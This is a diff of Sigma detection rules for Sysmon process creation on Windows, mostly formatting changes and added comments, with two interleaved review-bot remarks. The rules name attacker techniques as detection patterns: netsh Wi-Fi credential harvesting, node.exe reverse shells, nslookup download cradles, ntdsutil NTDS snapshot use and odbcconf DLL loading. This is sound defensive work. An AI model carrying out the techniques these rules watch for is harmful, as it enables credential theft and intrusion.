a/sigma/sysmon/process_creation/proc_creation_win_netsh_wifi_credential_harvesting.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_netsh_wifi_credential_harvesting.yml @@ -20,10 +20,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \netsh.exe - - OriginalFileName: netsh.exe + - Image|endswith: \netsh.exe + - OriginalFileName: netsh.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - wlan - ' s' - ' p' diff --git a/sigma/sysmon/process_creation/proc_creation_win_nltest_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_nltest_execution.yml index dafde2c4d..72f91a4ec 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_nltest_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_nltest_execution.yml 
@@ -1,10 +1,10 @@ title: Nltest.EXE Execution id: 903076ff-f442-475a-b667-4f246bcc203b related: - - id: 5cc90652-4cbd-4241-aa3b-4b462fa5a248 - type: similar - - id: eeb66bbb-3dde-4582-815a-584aee9fe6d1 - type: obsoletes + - id: 5cc90652-4cbd-4241-aa3b-4b462fa5a248 + type: similar + - id: eeb66bbb-3dde-4582-815a-584aee9fe6d1 + type: obsoletes status: test description: Detects nltest commands that can be used for information discovery references: @@ -25,8 +25,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \nltest.exe - - OriginalFileName: nltestrk.exe + - Image|endswith: \nltest.exe + - OriginalFileName: nltestrk.exe condition: process_creation and selection falsepositives: - Legitimate administration activity diff --git a/sigma/sysmon/process_creation/proc_creation_win_nltest_recon.yml b/sigma/sysmon/process_creation/proc_creation_win_nltest_recon.yml index 4b0ad9b9c..f4a666206 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_nltest_recon.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_nltest_recon.yml @@ -1,12 +1,12 @@ title: Potential Recon Activity Via Nltest.EXE id: 5cc90652-4cbd-4241-aa3b-4b462fa5a248 related: - - id: 410ad193-a728-4107-bc79-4419789fcbf8 - type: similar - - id: 903076ff-f442-475a-b667-4f246bcc203b - type: similar - - id: 77815820-246c-47b8-9741-e0def3f57308 - type: obsoletes + - id: 410ad193-a728-4107-bc79-4419789fcbf8 + type: similar + - id: 903076ff-f442-475a-b667-4f246bcc203b + type: similar + - id: 77815820-246c-47b8-9741-e0def3f57308 + type: obsoletes status: test description: Detects nltest commands that can be used for information discovery references: 
@@ -34,21 +34,21 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_nltest: - - Image|endswith: \nltest.exe - - OriginalFileName: nltestrk.exe + - Image|endswith: \nltest.exe + - OriginalFileName: nltestrk.exe selection_recon: - - CommandLine|contains|all: - - server - - query - - CommandLine|contains: - - /user - - all_trusts - - 'dclist:' - - 'dnsgetdc:' - - domain_trusts - - 'dsgetdc:' - - parentdomain - - trusted_domains + - CommandLine|contains|all: + - server + - query + - CommandLine|contains: + - /user + - all_trusts # Flag for /domain_trusts + - 'dclist:' + - 'dnsgetdc:' + - domain_trusts + - 'dsgetdc:' + - parentdomain + - trusted_domains condition: process_creation and (all of selection_*) falsepositives: - Legitimate administration use but user and host must be investigated diff --git a/sigma/sysmon/process_creation/proc_creation_win_node_abuse.yml b/sigma/sysmon/process_creation/proc_creation_win_node_abuse.yml index 3cb729f97..64a92026b 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_node_abuse.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_node_abuse.yml @@ -1,9 +1,7 @@ title: Potential Arbitrary Code Execution Via Node.EXE id: 6640f31c-01ad-49b5-beb5-83498a5cd8bd status: test -description: Detects the execution node.exe which is shipped with multiple software - such as VMware, Adobe...etc. In order to execute arbitrary code. For example to - establish reverse shell as seen in Log4j attacks...etc +description: Detects the execution node.exe which is shipped with multiple software such as VMware, Adobe...etc. In order to execute arbitrary code. For example to establish reverse shell as seen in Log4j attacks...etc references: - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html - https://www.sprocketsecurity.com/resources/crossing-the-log4j-horizon-a-vulnerability-with-no-return 
@@ -25,11 +23,12 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \node.exe - CommandLine|contains: + CommandLine|contains: - ' -e ' - ' --eval ' + # Add more pattern of abuse as actions action_reverse_shell: - CommandLine|contains|all: + CommandLine|contains|all: - .exec( - net.socket - .connect diff --git a/sigma/sysmon/process_creation/proc_creation_win_node_adobe_creative_cloud_abuse.yml b/sigma/sysmon/process_creation/proc_creation_win_node_adobe_creative_cloud_abuse.yml index b0d4a8c1a..7fbb00c86 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_node_adobe_creative_cloud_abuse.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_node_adobe_creative_cloud_abuse.yml @@ -1,8 +1,7 @@ title: Node Process Executions id: df1f26d3-bea7-4700-9ea2-ad3e990cf90e status: test -description: Detects the execution of other scripts using the Node executable packaged - with Adobe Creative Cloud +description: Detects the execution of other scripts using the Node executable packaged with Adobe Creative Cloud references: - https://twitter.com/mttaggart/status/1511804863293784064 author: Max Altgelt (Nextron Systems) @@ -22,7 +21,7 @@ detection: selection: Image|endswith: \Adobe Creative Cloud Experience\libs\node.exe filter: - CommandLine|contains: Adobe Creative Cloud Experience\js + CommandLine|contains: Adobe Creative Cloud Experience\js # Folder where Creative Cloud's JS resources are located condition: process_creation and (selection and not filter) fields: - Image diff --git a/sigma/sysmon/process_creation/proc_creation_win_nslookup_domain_discovery.yml b/sigma/sysmon/process_creation/proc_creation_win_nslookup_domain_discovery.yml index 6d4f8f494..677c80edd 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_nslookup_domain_discovery.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_nslookup_domain_discovery.yml 
@@ -1,8 +1,7 @@ title: Network Reconnaissance Activity id: e6313acd-208c-44fc-a0ff-db85d572e90e status: test -description: Detects a set of suspicious network related commands often used in recon - stages +description: Detects a set of suspicious network related commands often used in recon stages references: - https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/ author: Florian Roth (Nextron Systems) @@ -21,12 +20,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_nslookup: - CommandLine|contains|all: + CommandLine|contains|all: - nslookup - _ldap._tcp.dc._msdcs. condition: process_creation and (1 of selection*) falsepositives: - - False positives depend on scripts and administrative tools used in the monitored - environment + - False positives depend on scripts and administrative tools used in the monitored environment level: high ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_nslookup_poweshell_download.yml b/sigma/sysmon/process_creation/proc_creation_win_nslookup_poweshell_download.yml index ef1299368..c19e3e902 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_nslookup_poweshell_download.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_nslookup_poweshell_download.yml 
@@ -1,13 +1,12 @@ title: Nslookup PowerShell Download Cradle - ProcessCreation id: 1b3b01c7-84e9-4072-86e5-fc285a41ff23 related: - - id: 72671447-4352-4413-bb91-b85569687135 - type: obsoletes - - id: 999bff6d-dc15-44c9-9f5c-e1051bfc86e1 - type: similar + - id: 72671447-4352-4413-bb91-b85569687135 + type: obsoletes + - id: 999bff6d-dc15-44c9-9f5c-e1051bfc86e1 + type: similar status: test -description: Detects suspicious powershell download cradle using nslookup. This cradle - uses nslookup to extract payloads from DNS records +description: Detects suspicious powershell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records references: - https://twitter.com/Alh4zr3d/status/1566489367232651264 author: Nasreddine Bencherchali (Nextron Systems) @@ -24,13 +23,13 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|contains: \nslookup.exe - - OriginalFileName: \nslookup.exe + - Image|contains: \nslookup.exe + - OriginalFileName: \nslookup.exe selection_cmd: ParentImage|endswith: - \powershell.exe - \pwsh.exe - CommandLine|contains: + CommandLine|contains: - ' -q=txt ' - ' -querytype=txt ' condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_ntdsutil_susp_usage.yml b/sigma/sysmon/process_creation/proc_creation_win_ntdsutil_susp_usage.yml index 15654c713..fa0c01d51 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_ntdsutil_susp_usage.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_ntdsutil_susp_usage.yml 
@@ -1,11 +1,10 @@ title: Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe) id: a58353df-af43-4753-bad0-cd83ef35eef5 related: - - id: 2afafd61-6aae-4df4-baed-139fa1f4c345 - type: derived + - id: 2afafd61-6aae-4df4-baed-139fa1f4c345 + type: derived status: test -description: Detects execution of ntdsutil.exe to perform different actions such as - restoring snapshots...etc. +description: Detects execution of ntdsutil.exe to perform different actions such as restoring snapshots...etc. references: - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731620(v=ws.11) - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments @@ -23,16 +22,19 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \ntdsutil.exe - - OriginalFileName: ntdsutil.exe + - Image|endswith: \ntdsutil.exe + - OriginalFileName: ntdsutil.exe selection_cli: - - CommandLine|contains|all: - - snapshot - - 'mount ' - - CommandLine|contains|all: - - ac - - ' i' - - ' ntds' + - CommandLine|contains|all: + - snapshot + - 'mount ' # mounts a specific snapshot - Ex: ntdsutil snapshot "mount c2b3e2c6-1ffb-4625-ba8e-3503c27a9fcb" quit quit + - CommandLine|contains|all: + # This offers more coverage to the "selection_oneliner_1" case in rule 8bc64091-6875-4881-aaf9-7bd25b5dda08 + # The shorest form of "activate" can "ac". But "act", "acti"...etc are also valid forms + # Same case with the "instance" flag + - ac + - ' i' + - ' ntds' condition: process_creation and (all of selection_*) falsepositives: - Legitimate usage to restore snapshots diff --git a/sigma/sysmon/process_creation/proc_creation_win_ntdsutil_usage.yml b/sigma/sysmon/process_creation/proc_creation_win_ntdsutil_usage.yml index 40ac0fe20..c24dedfee 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_ntdsutil_usage.yml 
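Review bot: The comment added above the second `CommandLine|contains|all` entry in `selection_cli` has typos, `shorest` should be `shortest` and `can "ac"` should read `can be "ac"`. It would also help to say why `ac` is left without a leading space while `' i'` and `' ntds'` carry one, since a bare `ac` substring matches almost any command line and only the conjunction with the other two tokens keeps the selection precise; a line such as `# "ac" is intentionally unanchored; precision comes from also requiring " i" and " ntds"` would stop the next editor from "fixing" it. The `'mount '` example comment is useful, but the GUID in it is a sample and could be marked as such.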
+++ b/sigma/sysmon/process_creation/proc_creation_win_ntdsutil_usage.yml @@ -1,8 +1,7 @@ title: Invocation of Active Directory Diagnostic Tool (ntdsutil.exe) id: 2afafd61-6aae-4df4-baed-139fa1f4c345 status: test -description: Detects execution of ntdsutil.exe, which can be used for various attacks - against the NTDS database (NTDS.DIT) +description: Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT) references: - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/ntdsutil.htm author: Thomas Patzke diff --git a/sigma/sysmon/process_creation/proc_creation_win_odbcconf_driver_install.yml b/sigma/sysmon/process_creation/proc_creation_win_odbcconf_driver_install.yml index 49fc73473..7ef125300 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_odbcconf_driver_install.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_odbcconf_driver_install.yml @@ -1,11 +1,10 @@ title: Driver/DLL Installation Via Odbcconf.EXE id: 3f5491e2-8db8-496b-9e95-1029fce852d4 related: - - id: cb0fe7c5-f3a3-484d-aa25-d350a7912729 - type: similar + - id: cb0fe7c5-f3a3-484d-aa25-d350a7912729 + type: similar status: experimental -description: Detects execution of "odbcconf" with "INSTALLDRIVER" which installs a - new ODBC driver. Attackers abuse this to install and run malicious DLLs. +description: Detects execution of "odbcconf" with "INSTALLDRIVER" which installs a new ODBC driver. Attackers abuse this to install and run malicious DLLs. references: - https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/ - https://web.archive.org/web/20191023232753/https://twitter.com/Hexacorn/status/1187143326673330176 
@@ -24,16 +23,15 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \odbcconf.exe - - OriginalFileName: odbcconf.exe + - Image|endswith: \odbcconf.exe + - OriginalFileName: odbcconf.exe selection_cli: - CommandLine|contains|all: + # Note: The "/A" flag is not required to call a specific action + CommandLine|contains|all: - 'INSTALLDRIVER ' - .dll condition: process_creation and (all of selection_*) falsepositives: - - Legitimate driver DLLs being registered via "odbcconf" will generate false positives. - Investigate the path of the DLL and its contents to determine if the action - is authorized. + - Legitimate driver DLLs being registered via "odbcconf" will generate false positives. Investigate the path of the DLL and its contents to determine if the action is authorized. level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_odbcconf_driver_install_susp.yml b/sigma/sysmon/process_creation/proc_creation_win_odbcconf_driver_install_susp.yml index cd96c8dcf..66b86814a 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_odbcconf_driver_install_susp.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_odbcconf_driver_install_susp.yml 
@@ -1,12 +1,10 @@ title: Suspicious Driver/DLL Installation Via Odbcconf.EXE id: cb0fe7c5-f3a3-484d-aa25-d350a7912729 related: - - id: 3f5491e2-8db8-496b-9e95-1029fce852d4 - type: derived + - id: 3f5491e2-8db8-496b-9e95-1029fce852d4 + type: derived status: experimental -description: Detects execution of "odbcconf" with the "INSTALLDRIVER" action where - the driver doesn't contain a ".dll" extension. This is often used as a defense - evasion method. +description: Detects execution of "odbcconf" with the "INSTALLDRIVER" action where the driver doesn't contain a ".dll" extension. This is often used as a defense evasion method. references: - https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/ - https://web.archive.org/web/20191023232753/https://twitter.com/Hexacorn/status/1187143326673330176 @@ -25,12 +23,13 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \odbcconf.exe - - OriginalFileName: odbcconf.exe + - Image|endswith: \odbcconf.exe + - OriginalFileName: odbcconf.exe selection_cli: - CommandLine|contains: 'INSTALLDRIVER ' + # Note: The "/A" flag is not required to call a specific action + CommandLine|contains: 'INSTALLDRIVER ' filter_main_dll_ext: - CommandLine|contains: .dll + CommandLine|contains: .dll condition: process_creation and (all of selection_* and not 1 of filter_main_*) falsepositives: - Unlikely diff --git a/sigma/sysmon/process_creation/proc_creation_win_odbcconf_exec_susp_locations.yml b/sigma/sysmon/process_creation/proc_creation_win_odbcconf_exec_susp_locations.yml index ed6459df2..baee68bd0 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_odbcconf_exec_susp_locations.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_odbcconf_exec_susp_locations.yml 
@@ -1,8 +1,7 @@ title: Odbcconf.EXE Suspicious DLL Location id: 6b65c28e-11f3-46cb-902a-68f2cafaf474 status: experimental -description: Detects execution of "odbcconf" where the path of the DLL being registered - is located in a potentially suspicious location. +description: Detects execution of "odbcconf" where the path of the DLL being registered is located in a potentially suspicious location. references: - https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16 - https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html @@ -22,10 +21,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \odbcconf.exe - - OriginalFileName: odbcconf.exe + - Image|endswith: \odbcconf.exe + - OriginalFileName: odbcconf.exe selection_cli: - CommandLine|contains: + # Note: Add more suspicious locations + CommandLine|contains: - :\PerfLogs\ - :\ProgramData\ - :\Temp\ diff --git a/sigma/sysmon/process_creation/proc_creation_win_odbcconf_register_dll_regsvr.yml b/sigma/sysmon/process_creation/proc_creation_win_odbcconf_register_dll_regsvr.yml index cfbc3d624..a47e6e836 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_odbcconf_register_dll_regsvr.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_odbcconf_register_dll_regsvr.yml 
@@ -1,12 +1,10 @@ title: New DLL Registered Via Odbcconf.EXE id: 9f0a8bf3-a65b-440a-8c1e-5cb1547c8e70 related: - - id: ba4cfc11-d0fa-4d94-bf20-7c332c412e76 - type: similar + - id: ba4cfc11-d0fa-4d94-bf20-7c332c412e76 + type: similar status: experimental -description: Detects execution of "odbcconf" with "REGSVR" in order to register a - new DLL (equivalent to running regsvr32). Attackers abuse this to install and - run malicious DLLs. +description: Detects execution of "odbcconf" with "REGSVR" in order to register a new DLL (equivalent to running regsvr32). Attackers abuse this to install and run malicious DLLs. references: - https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16 - https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/ @@ -14,8 +12,7 @@ references: - https://web.archive.org/web/20191023232753/https://twitter.com/Hexacorn/status/1187143326673330176 - https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/ - https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html -author: Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community, Nasreddine - Bencherchali (Nextron Systems) +author: Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community, Nasreddine Bencherchali (Nextron Systems) date: 2023/05/22 tags: - attack.defense_evasion 
@@ -29,16 +26,15 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \odbcconf.exe - - OriginalFileName: odbcconf.exe + - Image|endswith: \odbcconf.exe + - OriginalFileName: odbcconf.exe selection_cli: - CommandLine|contains|all: + # Note: The "/A" flag is not required to call a specific action + CommandLine|contains|all: - 'REGSVR ' - .dll condition: process_creation and (all of selection_*) falsepositives: - - Legitimate DLLs being registered via "odbcconf" will generate false positives. - Investigate the path of the DLL and its content to determine if the action - is authorized. + - Legitimate DLLs being registered via "odbcconf" will generate false positives. Investigate the path of the DLL and its content to determine if the action is authorized. level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_odbcconf_register_dll_regsvr_susp.yml b/sigma/sysmon/process_creation/proc_creation_win_odbcconf_register_dll_regsvr_susp.yml index 567133fb2..b6cf0ee30 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_odbcconf_register_dll_regsvr_susp.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_odbcconf_register_dll_regsvr_susp.yml 
@@ -1,12 +1,10 @@ title: Potentially Suspicious DLL Registered Via Odbcconf.EXE id: ba4cfc11-d0fa-4d94-bf20-7c332c412e76 related: - - id: 9f0a8bf3-a65b-440a-8c1e-5cb1547c8e70 - type: derived + - id: 9f0a8bf3-a65b-440a-8c1e-5cb1547c8e70 + type: derived status: experimental -description: Detects execution of "odbcconf" with the "REGSVR" action where the DLL - in question doesn't contain a ".dll" extension. Which is often used as a method - to evade defenses. +description: Detects execution of "odbcconf" with the "REGSVR" action where the DLL in question doesn't contain a ".dll" extension. Which is often used as a method to evade defenses. references: - https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16 - https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/ @@ -25,12 +23,13 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \odbcconf.exe - - OriginalFileName: odbcconf.exe + - Image|endswith: \odbcconf.exe + - OriginalFileName: odbcconf.exe selection_cli: - CommandLine|contains: 'REGSVR ' + # Note: The "/A" flag is not required to call a specific action + CommandLine|contains: 'REGSVR ' filter_main_dll_ext: - CommandLine|contains: .dll + CommandLine|contains: .dll condition: process_creation and (all of selection_* and not 1 of filter_main_*) falsepositives: - Unlikely diff --git a/sigma/sysmon/process_creation/proc_creation_win_odbcconf_response_file.yml b/sigma/sysmon/process_creation/proc_creation_win_odbcconf_response_file.yml index a292161d1..92119ba19 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_odbcconf_response_file.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_odbcconf_response_file.yml 
@@ -1,20 +1,18 @@ title: Response File Execution Via Odbcconf.EXE id: 5f03babb-12db-4eec-8c82-7b4cb5580868 related: - - id: 2d32dd6f-3196-4093-b9eb-1ad8ab088ca5 - type: similar - - id: 65d2be45-8600-4042-b4c0-577a1ff8a60e - type: obsoletes + - id: 2d32dd6f-3196-4093-b9eb-1ad8ab088ca5 + type: similar + - id: 65d2be45-8600-4042-b4c0-577a1ff8a60e + type: obsoletes status: experimental -description: Detects execution of "odbcconf" with the "-f" flag in order to load a - response file which might contain a malicious action. +description: Detects execution of "odbcconf" with the "-f" flag in order to load a response file which might contain a malicious action. references: - https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16 - https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/ - https://www.cybereason.com/blog/threat-analysis-report-bumblebee-loader-the-high-road-to-enterprise-domain-control - https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/ -author: Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community, Nasreddine - Bencherchali (Nextron Systems) +author: Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community, Nasreddine Bencherchali (Nextron Systems) date: 2023/05/22 tags: - attack.defense_evasion 
@@ -28,19 +26,16 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \odbcconf.exe - - OriginalFileName: odbcconf.exe + - Image|endswith: \odbcconf.exe + - OriginalFileName: odbcconf.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - ' -f ' - ' /f ' selection_rsp_ext: - CommandLine|contains: .rsp + CommandLine|contains: .rsp condition: process_creation and (all of selection_*) falsepositives: - - The rule is looking for any usage of response file, which might generate false - positive when this function is used legitimately. Investigate the contents - of the ".rsp" file to determine if it is malicious and apply additional filters - if necessary. + - The rule is looking for any usage of response file, which might generate false positive when this function is used legitimately. Investigate the contents of the ".rsp" file to determine if it is malicious and apply additional filters if necessary. level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_odbcconf_response_file_susp.yml b/sigma/sysmon/process_creation/proc_creation_win_odbcconf_response_file_susp.yml index e31d004c9..d703c5fe5 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_odbcconf_response_file_susp.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_odbcconf_response_file_susp.yml 
@@ -1,13 +1,12 @@ title: Suspicious Response File Execution Via Odbcconf.EXE id: 2d32dd6f-3196-4093-b9eb-1ad8ab088ca5 related: - - id: 5f03babb-12db-4eec-8c82-7b4cb5580868 - type: derived - - id: 65d2be45-8600-4042-b4c0-577a1ff8a60e - type: obsoletes + - id: 5f03babb-12db-4eec-8c82-7b4cb5580868 + type: derived + - id: 65d2be45-8600-4042-b4c0-577a1ff8a60e + type: obsoletes status: experimental -description: Detects execution of "odbcconf" with the "-f" flag in order to load a - response file with a non-".rsp" extension. +description: Detects execution of "odbcconf" with the "-f" flag in order to load a response file with a non-".rsp" extension. references: - https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16 - https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/ @@ -27,18 +26,19 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \odbcconf.exe - - OriginalFileName: odbcconf.exe + - Image|endswith: \odbcconf.exe + - OriginalFileName: odbcconf.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - ' -f ' - ' /f ' filter_main_rsp_ext: - CommandLine|contains: .rsp + CommandLine|contains: .rsp filter_main_runonce_odbc: + # When odbcconf is run with the "/R" flag, it creates a "runonce" key to run at the next reboot ParentImage: C:\Windows\System32\runonce.exe Image: C:\Windows\System32\odbcconf.exe - CommandLine|contains: .exe /E /F "C:\WINDOWS\system32\odbcconf.tmp" + CommandLine|contains: .exe /E /F "C:\WINDOWS\system32\odbcconf.tmp" condition: process_creation and (all of selection_* and not 1 of filter_main_*) falsepositives: - Unlikely diff --git a/sigma/sysmon/process_creation/proc_creation_win_odbcconf_uncommon_child_process.yml b/sigma/sysmon/process_creation/proc_creation_win_odbcconf_uncommon_child_process.yml index fe1028934..be49e909e 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_odbcconf_uncommon_child_process.yml 
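Review bot: `filter_main_runonce_odbc` anchors on absolute paths (`ParentImage: C:\Windows\System32\runonce.exe`, `Image: C:\Windows\System32\odbcconf.exe` and a `C:\WINDOWS\system32\odbcconf.tmp` substring) while `selection_img` just above uses `Image|endswith`, so on a host whose system root is not `C:\Windows` the filter silently stops applying and the reboot-time re-execution it describes would alert. That is the fail-safe direction, but it deserves a line in the added comment, e.g. `# Paths are intentionally absolute; the filter does not apply on non-default system roots`, or a switch to `|endswith` on `\runonce.exe`, `\odbcconf.exe` and `\odbcconf.tmp"` if suppression there is intended. The comment could also spell out that the `/E /F` command line it guards is the one RunOnce replays after the `/R` registration, which I read the current wording as only implying.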
+++ b/sigma/sysmon/process_creation/proc_creation_win_odbcconf_uncommon_child_process.yml @@ -1,8 +1,7 @@ title: Uncommon Child Process Spawned By Odbcconf.EXE id: 8e3c7994-131e-4ba5-b6ea-804d49113a26 status: experimental -description: Detects an uncommon child process of "odbcconf.exe" binary which normally - shouldn't have any child processes. +description: Detects an uncommon child process of "odbcconf.exe" binary which normally shouldn't have any child processes. references: - https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16 - https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/ @@ -25,8 +24,6 @@ detection: condition: process_creation and selection falsepositives: - In rare occurrences where "odbcconf" crashes. It might spawn a "werfault" process - - Other child processes will depend on the DLL being registered by actions like - "regsvr". In case where the DLLs have external calls (which should be rare). - Other child processes might spawn and additional filters need to be applied. + - Other child processes will depend on the DLL being registered by actions like "regsvr". In case where the DLLs have external calls (which should be rare). Other child processes might spawn and additional filters need to be applied. level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_office_arbitrary_cli_download.yml b/sigma/sysmon/process_creation/proc_creation_win_office_arbitrary_cli_download.yml index 92b02e292..7675918c9 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_office_arbitrary_cli_download.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_office_arbitrary_cli_download.yml 
@@ -1,8 +1,8 @@ title: Potential Arbitrary File Download Using Office Application id: 4ae3e30b-b03f-43aa-87e3-b622f4048eed related: - - id: 0c79148b-118e-472b-bdb7-9b57b444cc19 - type: obsoletes + - id: 0c79148b-118e-472b-bdb7-9b57b444cc19 + type: obsoletes status: experimental description: Detects potential arbitrary file download using a Microsoft Office application references: @@ -25,16 +25,16 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \EXCEL.EXE - - \POWERPNT.EXE - - \WINWORD.exe - - OriginalFileName: - - Excel.exe - - POWERPNT.EXE - - WinWord.exe + - Image|endswith: + - \EXCEL.EXE + - \POWERPNT.EXE + - \WINWORD.exe + - OriginalFileName: + - Excel.exe + - POWERPNT.EXE + - WinWord.exe selection_http: - CommandLine|contains: + CommandLine|contains: - http:// - https:// condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_office_excel_dcom_lateral_movement.yml b/sigma/sysmon/process_creation/proc_creation_win_office_excel_dcom_lateral_movement.yml index e9ead677b..8c638e724 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_office_excel_dcom_lateral_movement.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_office_excel_dcom_lateral_movement.yml @@ -1,10 +1,8 @@ title: Potential Excel.EXE DCOM Lateral Movement Via ActivateMicrosoftApp id: 551d9c1f-816c-445b-a7a6-7a3864720d60 status: experimental -description: 'Detects suspicious child processes of Excel which could be an indicator - of lateral movement leveraging the "ActivateMicrosoftApp" Excel DCOM object. - - ' +description: | + Detects suspicious child processes of Excel which could be an indicator of lateral movement leveraging the "ActivateMicrosoftApp" Excel DCOM object. references: - https://posts.specterops.io/lateral-movement-abuse-the-power-of-dcom-excel-application-3c016d0d9922 - https://github.com/grayhatkiller/SharpExShell 
@@ -25,14 +23,14 @@ detection: selection_parent: ParentImage|endswith: \excel.exe selection_child: - - OriginalFileName: - - foxprow.exe - - schdplus.exe - - winproj.exe - - Image|endswith: - - \foxprow.exe - - \schdplus.exe - - \winproj.exe + - OriginalFileName: + - foxprow.exe + - schdplus.exe + - winproj.exe + - Image|endswith: + - \foxprow.exe + - \schdplus.exe + - \winproj.exe condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_office_exec_from_trusted_locations.yml b/sigma/sysmon/process_creation/proc_creation_win_office_exec_from_trusted_locations.yml index ab38aa7d9..57ca5c2a7 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_office_exec_from_trusted_locations.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_office_exec_from_trusted_locations.yml @@ -1,9 +1,7 @@ title: Potentially Suspicious Office Document Executed From Trusted Location id: f99abdf0-6283-4e71-bd2b-b5c048a94743 status: experimental -description: Detects the execution of an Office application that points to a document - that is located in a trusted location. Attackers often used this to avoid macro - security and execute their malicious code. +description: Detects the execution of an Office application that points to a document that is located in a trusted location. Attackers often used this to avoid macro security and execute their malicious code. references: - Internal Research - https://twitter.com/Max_Mal_/status/1633863678909874176 
